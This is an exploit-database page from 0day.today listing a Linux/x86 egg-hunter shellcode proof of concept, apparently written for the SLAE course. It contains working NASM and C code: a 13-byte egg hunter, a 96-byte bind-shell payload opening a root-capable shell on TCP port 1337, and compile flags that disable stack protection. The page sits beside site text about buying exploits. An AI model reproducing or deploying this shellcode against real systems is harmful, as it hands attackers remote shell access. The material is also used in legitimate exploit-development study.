0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - Egg-hunter Shellcode (13 bytes)
/* * Title: Egg Hunter PoC * Platform: linux/x86 * Date: 2015-01-07 * Author: Dennis 'dhn' Herrmann * Website: https://zer0-day.pw * Github: https://github.com/dhn/SLAE/ * SLAE-721 */ /* * egg_hunter.nasm * --------------- * BITS 32 * * global _start * section .text * * EGG_SIG equ 0x4f904790 ; signature * * _start: * cdq ; zero out edx * mov edx, EGG_SIG ; edx = 0x4f904790 * * search_the_egg: * inc eax ; increment eax * cmp DWORD [eax], edx ; compare eax with the EGG_SIG * jne search_the_egg ; if not compare jump to search_the_egg * * jmp eax ; jump to eax * */ #include <stdio.h> #include <string.h> /* * Egg Signature: * * 0x4f 0x90 0x47 0x90 * | | | | * dec edi - NOP - inc edi - NOP */ #define EGG_SIG "\x90\x47\x90\x4f" unsigned char egg_hunter[] = \ "\x99" /* cdq */ "\xba\x90\x47\x90\x4f" /* mov edx, 0x4f904790 */ "\x40" /* inc eax */ "\x39\x10" /* cmp DWORD PTR [eax], edx */ "\x75\xfb" /* jne 6 <search_the_egg> */ "\xff\xe0"; /* jmp eax */ /* * Bind Shell TCP shellcode - 96 byte * bind to port: 1337 */ unsigned char shellcode[] = \ EGG_SIG /* Egg Signature */ "\x6a\x66\x58\x6a\x01\x5b\x31\xf6" "\x56\x6a\x01\x6a\x02\x89\xe1\xcd" "\x80\x5f\x97\x93\xb0\x66\x56\x66" "\x68\x05\x39\x66\x6a\x02\x89\xe1" "\x6a\x10\x51\x57\x89\xe1\xcd\x80" "\xb0\x66\xb3\x04\x56\x57\x89\xe1" "\xcd\x80\xb0\x66\xb3\x05\x56\x56" "\x57\x89\xe1\xcd\x80\x93\x31\xc9" "\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80" "\x75\xf8\x6a\x0b\x58\x31\xc9\x51" "\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x89\xca\xcd\x80"; /* * $ gcc -Wl,-z,execstack -fno-stack-protector PoC.c -o PoC * [+] Egg Hunter Length: 13 * [+] Shellcode Length + 4 byte egg: 100 * */ void main() { printf("[+] Egg Hunter Length: %d\n", strlen(egg_hunter)); printf("[+] Shellcode Length + 4 byte egg: %d\n", strlen(shellcode)); int (*ret)() = (int(*)())egg_hunter; ret(); } # 0day.today [2024-10-06] #